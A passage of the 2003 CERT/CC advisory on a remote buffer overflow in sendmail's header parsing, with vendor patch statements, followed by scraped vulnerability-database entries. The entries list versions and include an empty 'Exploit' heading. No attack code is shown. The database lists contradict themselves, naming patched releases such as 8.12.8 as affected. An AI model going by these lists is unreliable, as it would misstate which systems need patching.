   workstations  provide  a  sendmail  implementation that is enabled and
   running by default.

   This    vulnerability    is    message-oriented    as    opposed    to
   connection-oriented. That means that the vulnerability is triggered by
   the  contents  of  a  specially-crafted  email  message rather than by
   lower-level  network  traffic.  This  is important because an MTA that
   does  not  contain  the  vulnerability will pass the malicious message
   along  to  other  MTAs  that may be protected at the network level. In
   other  words, vulnerable sendmail servers on the interior of a network
   are  still  at risk, even if the site's border MTA uses software other
   than sendmail. Also, messages capable of exploiting this vulnerability
   may pass undetected through many common packet filters or firewalls.

   Sendmail has indicated to the CERT/CC that this vulnerability has been
   successfully  exploited in a laboratory environment. We do not believe
   that   this   exploit  is  available  to  the  public.  However,  this
   vulnerability  is  likely  to  draw  significant  attention  from  the
   intruder community, so the probability of a public exploit is high.

   A  successful  attack  against  an  unpatched sendmail system will not
   leave any messages in the system log. However, on a patched system, an
   attempt  to  exploit  this  vulnerability will leave the following log
   message:

     Dropped invalid comments from header address

   Although  this does not represent conclusive evidence of an attack, it
   may be useful as an indicator.

   A  patched  sendmail server will drop invalid headers, thus preventing
   downstream servers from receiving them.

   The CERT/CC is tracking this issue as VU#398025. This reference number
   corresponds to CVE candidate CAN-2002-1337.

   For more information, please see

       http://www.sendmail.org
       http://www.sendmail.org/8.12.8.html
       http://www.sendmail.com/security/
       http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21950
       http://www.kb.cert.org/vuls/id/398025

II. Impact

   Successful exploitation of this vulnerability may allow an attacker to
   gain  the  privileges  of  the  sendmail  daemon, typically root. Even
   vulnerable  sendmail servers on the interior of a given network may be
   at  risk  since  the vulnerability is triggered from the contents of a
   malicious email message.

III. Solution

Apply a patch from Sendmail

   Sendmail  has produced patches for versions 8.9, 8.10, 8.11, and 8.12.
   However,  the  vulnerability  also  exists  in earlier versions of the
   code;  therefore,  site  administrators  using  an earlier version are
   encouraged to upgrade to 8.12.8. These patches are located at

       ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.security.cr.patch
       ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.11.6.security.cr.patch
       ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.9.3.security.cr.patch

Apply a patch from your vendor

   Many  vendors  include  vulnerable  sendmail  servers as part of their
   software distributions. We have notified vendors of this vulnerability
   and  recorded  their  responses  in  the  systems  affected section of
   VU#398025.  Several  vendors  have  provided  a  statement  for direct
   inclusion in this advisory; these statements are available in Appendix
   A.

Enable the RunAsUser option

   There is no known workaround for this vulnerability. Until a patch can
   be  applied,  you  may  wish to set the RunAsUser option to reduce the
   impact  of this vulnerability. As a good general practice, the CERT/CC
   recommends  limiting  the  privileges  of  an  application  or service
   whenever possible.

Appendix A. - Vendor Information

   This  appendix  contains  information  provided  by  vendors  for this
   advisory.  As  vendors  report new information to the CERT/CC, we will
   update this section and note the changes in our revision history. If a
   particular  vendor  is  not  listed  below, we have not received their
   comments.

Apple Computer, Inc.

   Security  Update  2003-03-03  is available to fix this issue. Packages
   are  available  for  Mac OS X 10.1.5 and Mac OS X 10.2.4. It should be
   noted  that  sendmail  is  not enabled by default on Mac OS X, so only
   those  systems which have explicitly enabled it are susceptible to the
   vulnerability.  All  customers of Mac OS X, however, are encouraged to
   apply this update to their systems.

Avaya, Inc.

   Avaya  is  aware  of the vulnerability and is investigating impact. As
   new information is available this statement will be updated.

BSD/OS

   Wind  River  Systems  has  created  patches for this problem which are
   available  from  the  normal  locations for each release. The relevant
   patches are M500-006 for BSD/OS version 5.0 or the Wind River Platform
   for  Server Appliances 1.0, M431-002 for BSD/OS 4.3.1, or M420-032 for
   BSD/OS 4.2 systems.

Cisco Systems

   Cisco is investigating this issue. If we determine any of our products
   are    vulnerable    that    information   will   be   available   at:
   http://www.cisco.com/go/psirt

Cray Inc.

   The  code  supplied  by Cray, Inc. in Unicos, Unicos/mk, and Unicos/mp
   may  be  vulnerable.  Cray  has  opened  SPRs  724749  and  724750  to
   investigate.

   Cray, Inc. is not vulnerable for the MTA systems.

Hewlett-Packard Company

   SOURCE:
            Hewlett-Packard Company
            HP Services
            Software Security Response Team
   
   x-ref:  SSRT3469 sendmail
   
   HP will provide notice of the availability of patches through standard
   security bulletin announcements and be available from your normal HP
   Services support channel.

IBM Corporation

   The  AIX  operating  system  is  vulnerable  to  the  sendmail  issues
   discussed in releases 4.3.3, 5.1.0 and 5.2.0.

   A  temporary  patch  is available through an efix package which can be
   found at
   ftp://ftp.software.ibm.com/aix/efixes/security/sendmail_efix.tar.Z

   IBM will provide the following official fixes:

          APAR   number   for   AIX  4.3.3:  IY40500  (available  approx.
          03/12/2003)
          APAR   number   for   AIX  5.1.0:  IY40501  (available  approx.
          04/28/2003)
          APAR   number   for   AIX  5.2.0:  IY40502  (available  approx.
          04/28/2003)

Openwall GNU/*/Linux

   Openwall GNU/*/Linux is not vulnerable. We use Postfix as the MTA, not
   sendmail.

Red Hat Inc.

   Updated  sendmail  packages  that are not vulnerable to this issue are
   available  for  Red  Hat  Linux,  Red Hat Advanced Server, and Red Hat
   Advanced  Workstation.  Red Hat Network users can update their systems
   using the 'up2date' tool.

   Red Hat Linux:

     http://rhn.redhat.com/errata/RHSA-2003-073.html

   Red Hat Linux Advanced Server, Advanced Workstation:

     http://rhn.redhat.com/errata/RHSA-2003-074.html

SGI

   SGI  acknowledges  VU#398025  reported  by  CERT  and  has released an
   advisory to address the vulnerability on IRIX.

   Refer   to   SGI   Security   Advisory  20030301-01-P  available  from
   ftp://patches.sgi.com/support/free/security/advisories/20030301-01-P
   or http://www.sgi.com/support/security/.

The Sendmail Consortium

   The  Sendmail  Consortium  suggests  that  sites  upgrade to 8.12.8 if
   possible.  Alternatively,  patches  are available for 8.9, 8.10, 8.11,
   and 8.12 on http://www.sendmail.org/

Sendmail, Inc.

   All  commercial  releases including Sendmail Switch, Sendmail Advanced
   Message  Server (which includes the Sendmail Switch MTA), Sendmail for
   NT,  and Sendmail Pro are affected by this issue. Patch information is
   available at http://www.sendmail.com/security.
     _________________________________________________________________

   Our  thanks  to  Internet  Security Systems, Inc. for discovering this
   problem,  and  to  Eric  Allman,  Claus  Assmann,  and Greg Shapiro of
   Sendmail  for  notifying  us of this problem. We thank both groups for
   their assistance in coordinating the response to this problem.
     _________________________________________________________________

   Authors: Jeffrey P. Lanza and Shawn V. Hernan
   ______________________________________________________________________

   This document is available from:
   http://www.cert.org/advisories/CA-2003-07.html
   ______________________________________________________________________

CERT/CC Contact Information

   Email: cert@cert.org
          Phone: +1 412-268-7090 (24-hour hotline)
          Fax: +1 412-268-6989
          Postal address:
          CERT Coordination Center
          Software Engineering Institute
          Carnegie Mellon University
          Pittsburgh PA 15213-3890
          U.S.A.

   CERT/CC   personnel   answer  the  hotline  08:00-17:00  EST(GMT-5)  /
   EDT(GMT-4)  Monday  through  Friday;  they are on call for emergencies
   during other hours, on U.S. holidays, and on weekends.

Using encryption

   We  strongly  urge you to encrypt sensitive information sent by email.
   Our public PGP key is available from
   http://www.cert.org/CERT_PGP.key

   If  you  prefer  to  use  DES,  please  call the CERT hotline for more
   information.

Getting security information

   CERT  publications  and  other security information are available from
   our web site
   http://www.cert.org/

   To  subscribe  to  the CERT mailing list for advisories and bulletins,
   send  email  to majordomo@cert.org. Please include in the body of your
   message

   subscribe cert-advisory

   *  "CERT"  and  "CERT  Coordination Center" are registered in the U.S.
   Patent and Trademark Office.
   ______________________________________________________________________

   NO WARRANTY
   Any  material furnished by Carnegie Mellon University and the Software
   Engineering  Institute  is  furnished  on  an  "as is" basis. Carnegie
   Mellon University makes no warranties of any kind, either expressed or
   implied  as  to  any matter including, but not limited to, warranty of
   fitness  for  a  particular purpose or merchantability, exclusivity or
   results  obtained from use of the material. Carnegie Mellon University
   does  not  make  any warranty of any kind with respect to freedom from
   patent, trademark, or copyright infringement.
     _________________________________________________________________

   Conditions for use, disclaimers, and sponsorship information

   Copyright 2003 Carnegie Mellon University.

   Revision History
Mar 03, 2003:  Initial release

- Vulnerability Information

4502
Sendmail headers.c crackaddr Function Address Field Handling Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- Vulnerability Description

- Timeline

2003-03-04 Unknown
Unknown Unknown

- Solution

Upgrade to version 8.12.8 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability Author

Unknown or Incomplete

- Vulnerability Information

Sendmail Header Processing Buffer Overflow Vulnerability
Boundary Condition Error 6991
Yes Yes
2003-03-02 12:00:00 2007-09-22 12:30:00
Discovered by Mark Dowd of ISS X-Force.

- Affected Program Versions

Wind River Systems Platform SA 1.0
Wind River Systems BSD/OS 5.0
Wind River Systems BSD/OS 4.3.1
Wind River Systems BSD/OS 4.2
Sun Solaris 9_x86
Sun Solaris 9
Sun Solaris 8_x86
Sun Solaris 8_sparc
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.6_x86
Sun Solaris 2.6
Sun LX50
Sun Cobalt RaQ XTR
Sun Cobalt RaQ 550
Sun Cobalt RaQ 4
Sun Cobalt RaQ 3
Sun Cobalt Qube 3
Sun Cobalt ManageRaQ3 3000R-mr
Sun Cobalt CacheRaQ 4
SGI IRIX 6.5.19
SGI IRIX 6.5.18
SGI IRIX 6.5.17
SGI IRIX 6.5.16
SGI IRIX 6.5.15
SGI IRIX 6.5.14
SGI IRIX 6.5.13
SGI IRIX 6.5.12
SGI IRIX 6.5.11
SGI IRIX 6.5.10
SGI IRIX 6.5.9
SGI IRIX 6.5.8
SGI IRIX 6.5.7
SGI IRIX 6.5.6
SGI IRIX 6.5.5
SGI IRIX 6.5.4
SGI IRIX 6.5.3
SGI IRIX 6.5.2
SGI IRIX 6.5.1
SGI IRIX 6.5
SGI Freeware 1.0
Sendmail Inc Sendmail Switch 3.0.2
Sendmail Inc Sendmail Switch 3.0.1
Sendmail Inc Sendmail Switch 3.0
Sendmail Inc Sendmail Switch 2.2.4
Sendmail Inc Sendmail Switch 2.2.3
Sendmail Inc Sendmail Switch 2.2.2
Sendmail Inc Sendmail Switch 2.2.1
Sendmail Inc Sendmail Switch 2.2
Sendmail Inc Sendmail Switch 2.1.4
Sendmail Inc Sendmail Switch 2.1.3
Sendmail Inc Sendmail Switch 2.1.2
Sendmail Inc Sendmail Switch 2.1.1
Sendmail Inc Sendmail Switch 2.1
Sendmail Inc Sendmail for NT 3.0.2
Sendmail Inc Sendmail for NT 3.0.1
Sendmail Inc Sendmail for NT 3.0
Sendmail Inc Sendmail for NT 2.6.1
Sendmail Inc Sendmail for NT 2.6
Sendmail Inc Sendmail Advanced Message Server 1.3
Sendmail Inc Sendmail Advanced Message Server 1.2
Sendmail Consortium Sendmail Switch 3.0.2
Sendmail Consortium Sendmail Switch 3.0.1
Sendmail Consortium Sendmail Switch 3.0
Sendmail Consortium Sendmail Switch 2.2.4
Sendmail Consortium Sendmail Switch 2.2.3
Sendmail Consortium Sendmail Switch 2.2.2
Sendmail Consortium Sendmail Switch 2.2.1
Sendmail Consortium Sendmail Switch 2.2
Sendmail Consortium Sendmail Switch 2.1.4
Sendmail Consortium Sendmail Switch 2.1.3
Sendmail Consortium Sendmail Switch 2.1.2
Sendmail Consortium Sendmail Switch 2.1.1
Sendmail Consortium Sendmail Switch 2.1
Sendmail Consortium Sendmail for NT 3.0.2
Sendmail Consortium Sendmail for NT 3.0.1
Sendmail Consortium Sendmail for NT 3.0
Sendmail Consortium Sendmail for NT 2.6.1
Sendmail Consortium Sendmail for NT 2.6
Sendmail Consortium Sendmail 8.12.7
+ OpenPKG OpenPKG 1.2
+ Slackware Linux 8.1
+ SOTLinux SOTLinux 2003 Desktop
+ SOTLinux SOTLinux 2003 Server
Sendmail Consortium Sendmail 8.12.6
Sendmail Consortium Sendmail 8.12.5
Sendmail Consortium Sendmail 8.12.4
+ OpenBSD OpenBSD 3.2
+ Slackware Linux 8.1
+ Slackware Linux -current
Sendmail Consortium Sendmail 8.12.3
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ FreeBSD FreeBSD 4.6
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0
Sendmail Consortium Sendmail 8.12.2
Sendmail Consortium Sendmail 8.12.1
+ HP MPE/iX 7.5
+ HP MPE/iX 7.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
Sendmail Consortium Sendmail 8.12 beta7
Sendmail Consortium Sendmail 8.12 beta5
Sendmail Consortium Sendmail 8.12 beta16
Sendmail Consortium Sendmail 8.12 beta12
Sendmail Consortium Sendmail 8.12 beta10
Sendmail Consortium Sendmail 8.12 .0
Sendmail Consortium Sendmail 8.11.6
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ FreeBSD FreeBSD 4.5 -RELEASE
+ FreeBSD FreeBSD 4.5
+ FreeBSD FreeBSD 4.4
+ Immunix Immunix OS 7.0
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.0 i386
+ RedHat Linux 6.2 i386
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3
+ Sun Cobalt RaQ 550
+ Sun Linux 5.0.3
+ Sun Linux 5.0
Sendmail Consortium Sendmail 8.11.5
Sendmail Consortium Sendmail 8.11.4
+ Conectiva Linux 7.0
- Slackware Linux 8.0
Sendmail Consortium Sendmail 8.11.3
- MandrakeSoft Corporate Server 1.0.1
- Mandriva Linux Mandrake 8.0
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.2
- Slackware Linux 7.1
Sendmail Consortium Sendmail 8.11.2
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.1
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
Sendmail Consortium Sendmail 8.11.1
Sendmail Consortium Sendmail 8.11
+ Compaq Tru64 5.1 b
+ Compaq Tru64 5.1 a
+ Compaq Tru64 5.1
+ IBM AIX 5.2
+ IBM AIX 5.1
- Mandriva Linux Mandrake 7.2
+ RedHat Linux 7.0 sparc
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 7.0
- S.u.S.E. Linux 7.0 sparc
- S.u.S.E. Linux 7.0 ppc
- S.u.S.E. Linux 7.0 alpha
- S.u.S.E. Linux 7.0
+ SCO Open Server 5.0.6 a
+ SCO Open Server 5.0.6
+ SCO Open Server 5.0.5
+ SCO Open Server 5.0.4
Sendmail Consortium Sendmail 8.10.2
+ Sun Cobalt Qube3 4000WG
+ Sun Cobalt RaQ 4
+ Sun Cobalt RaQ XTR
+ Sun Cobalt RaQ XTR 3500R
+ Sun Cobalt RaQ4 3001R
Sendmail Consortium Sendmail 8.10.1
Sendmail Consortium Sendmail 8.10
Sendmail Consortium Sendmail 8.9.3
+ Compaq Tru64 5.1 PK5 (BL19)
+ Compaq Tru64 5.0 a PK3 (BL17)
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ IBM AIX 4.3.3
+ SGI IRIX 6.5.19
+ SGI IRIX 6.5.18 m
+ SGI IRIX 6.5.18 f
+ SGI IRIX 6.5.17 m
+ SGI IRIX 6.5.17 f
+ SGI IRIX 6.5.16 m
+ SGI IRIX 6.5.16 f
+ SGI IRIX 6.5.15 m
+ SGI IRIX 6.5.15 f
+ SGI IRIX 6.5.14 m
+ SGI IRIX 6.5.14 f
+ SGI IRIX 6.5.13 m
+ SGI IRIX 6.5.13 f
+ SGI IRIX 6.5.12 m
+ SGI IRIX 6.5.12 f
+ SGI IRIX 6.5.11 m
+ SGI IRIX 6.5.11 f
+ SGI IRIX 6.5.10 m
+ SGI IRIX 6.5.10 f
+ SGI IRIX 6.5.9 m
+ SGI IRIX 6.5.9 f
+ SGI IRIX 6.5.8 m
+ SGI IRIX 6.5.8 f
+ SGI IRIX 6.5.7 m
+ SGI IRIX 6.5.7 f
Sendmail Consortium Sendmail 8.9.2
Sendmail Consortium Sendmail 8.9.1
Sendmail Consortium Sendmail 8.9 .0
Sendmail Consortium Sendmail 8.8.8
Sendmail Consortium Sendmail 5.65
Sendmail Consortium Sendmail 5.61
Sendmail Consortium Sendmail 5.59
SCO Unixware 7.1.3
SCO Unixware 7.1.1
SCO Open UNIX 8.0
NetBSD NetBSD 1.6
NetBSD NetBSD 1.5.3
NetBSD NetBSD 1.5.2
NetBSD NetBSD 1.5.1
NetBSD NetBSD 1.5
IBM z/OS V1R4
IBM z/OS V1R2
IBM OS/390 V2R8
IBM OS/390 V2R10
IBM MVS
HP MPE/iX 6.5
HP HP-UX (VVOS) 11.0 4
HP HP-UX 11.22
HP HP-UX 11.11
HP HP-UX 11.0 4
HP HP-UX 11.0
HP HP-UX 10.20
HP HP-UX 10.10
HP HP-UX B.11.22
HP HP-UX B.11.11
HP HP-UX B.11.04
HP HP-UX B.11.00
HP AlphaServer SC
Gentoo Linux 1.4 _rc2
Gentoo Linux 1.4 _rc1
FreeBSD FreeBSD 5.0
FreeBSD FreeBSD 4.7
FreeBSD FreeBSD 4.6
SGI IRIX 6.5.20
Sendmail Inc Sendmail Switch 3.0.3
Sendmail Inc Sendmail Switch 2.2.5
Sendmail Inc Sendmail Switch 2.1.5
Sendmail Inc Sendmail for NT 3.0.3
Sendmail Inc Sendmail for NT 2.6.2
Sendmail Consortium Sendmail Switch 3.0.3
Sendmail Consortium Sendmail Switch 2.2.5
Sendmail Consortium Sendmail Switch 2.1.5
Sendmail Consortium Sendmail for NT 3.0.3
Sendmail Consortium Sendmail for NT 2.6.2
Sendmail Consortium Sendmail 8.12.8
+ RedHat Linux 9.0 i386
+ RedHat Linux 8.0 i386
+ Yellow Dog Linux 3.0
Openwall Openwall GNU/*/Linux 1.0
Juniper Networks JUNOS 5.1
Juniper Networks JUNOS 5.0

- Unaffected Program Versions

SGI IRIX 6.5.20
Sendmail Inc Sendmail Switch 3.0.3
Sendmail Inc Sendmail Switch 2.2.5
Sendmail Inc Sendmail Switch 2.1.5
Sendmail Inc Sendmail for NT 3.0.3
Sendmail Inc Sendmail for NT 2.6.2
Sendmail Consortium Sendmail Switch 3.0.3
Sendmail Consortium Sendmail Switch 2.2.5
Sendmail Consortium Sendmail Switch 2.1.5
Sendmail Consortium Sendmail for NT 3.0.3
Sendmail Consortium Sendmail for NT 2.6.2
Sendmail Consortium Sendmail 8.12.8
+ RedHat Linux 9.0 i386
+ RedHat Linux 8.0 i386
+ Yellow Dog Linux 3.0
Openwall Openwall GNU/*/Linux 1.0
Juniper Networks JUNOS 5.1
Juniper Networks JUNOS 5.0

- Vulnerability Discussion

Sendmail is prone to a remote buffer-overflow vulnerability in the SMTP header parsing component. Successful attackers may exploit this vulnerability to gain control of affected servers.

Reportedly, this vulnerability may be locally exploitable if the sendmail binary is setuid/setgid.

Sendmail 5.2 to 8.12.7 are affected. Administrators are advised to upgrade to 8.12.8 or to apply patches to earlier versions of the 8.12.x tree.

- Exploit

The following exploit was provided:

- Solution

Please see the references for more information.


Sun Solaris 8_sparc

IBM z/OS V1R4
  • IBM PQ71679


Sun Solaris 7.0

HP HP-UX B.11.11

HP HP-UX B.11.00

IBM z/OS V1R2
  • IBM PQ71679


IBM OS/390 V2R8
  • IBM PQ71679


HP HP-UX 10.20

HP HP-UX 11.0 4

HP HP-UX 11.0

HP HP-UX 11.11

HP HP-UX 11.22

Sendmail Inc Sendmail Switch 2.1.2

Sendmail Inc Sendmail Switch 2.1.3

Sendmail Inc Sendmail Switch 2.2

Sendmail Inc Sendmail Switch 2.2.2

Sendmail Inc Sendmail Switch 2.2.3

Sendmail Inc Sendmail for NT 2.6

Sendmail Inc Sendmail for NT 2.6.1

Sendmail Inc Sendmail Switch 3.0.1

Sendmail Inc Sendmail for NT 3.0.2

FreeBSD FreeBSD 4.6

FreeBSD FreeBSD 5.0

Sendmail Consortium Sendmail 5.59

Sendmail Consortium Sendmail 5.65

SGI IRIX 6.5.15

SGI IRIX 6.5.16

SGI IRIX 6.5.17

SGI IRIX 6.5.18

SGI IRIX 6.5.19

SCO Unixware 7.1.1

Sendmail Consortium Sendmail 8.10

Sendmail Consortium Sendmail 8.10.1

Sendmail Consortium Sendmail 8.10.2

Sendmail Consortium Sendmail 8.11

Sendmail Consortium Sendmail 8.11.2

Sendmail Consortium Sendmail 8.11.3

Sendmail Consortium Sendmail 8.11.4

Sendmail Consortium Sendmail 8.11.5

Sendmail Consortium Sendmail 8.11.6

Sendmail Consortium Sendmail 8.12 beta12

Sendmail Consortium Sendmail 8.12 beta5

Sendmail Consortium Sendmail 8.12 beta16

Sendmail Consortium Sendmail 8.12.1

Sendmail Consortium Sendmail 8.12.3

Sendmail Consortium Sendmail 8.12.4

Sendmail Consortium Sendmail 8.12.7

Sendmail Consortium Sendmail 8.9 .0

Sendmail Consortium Sendmail 8.9.2

Sendmail Consortium Sendmail 8.9.3

- References
